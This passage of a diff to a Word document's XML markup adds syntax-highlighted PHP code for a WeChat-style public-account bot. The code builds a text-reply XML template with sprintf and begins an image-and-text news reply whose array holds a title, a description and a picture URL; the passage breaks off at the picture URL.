+              <w:t>&lt;CreateTime&gt;%s&lt;/CreateTime&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;MsgType&gt;&lt;![CDATA[%s]]&gt;&lt;/MsgType&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;Content&gt;&lt;![CDATA[%s]]&gt;&lt;/Content&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;/xml&gt;"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="295F94"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">echo </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="BC5A65"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>sprintf</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$template</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$toUser</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$fromUser</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$time</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$msgType</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$content</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -19158,6 +18286,1110 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>图文消息回复：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>//</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>回复一个图文消息</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$toUser</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$postObj</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="566874"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>FromUserName</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$fromUser</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$postObj</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="566874"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>ToUserName</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$time</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="BC5A65"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>time</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$arr</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="295F94"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>array</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="295F94"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>array</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>'title'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>=&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>虎哥爆照</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>'description'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>=&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>虎哥的照片，哈哈</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>'PicUrl'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
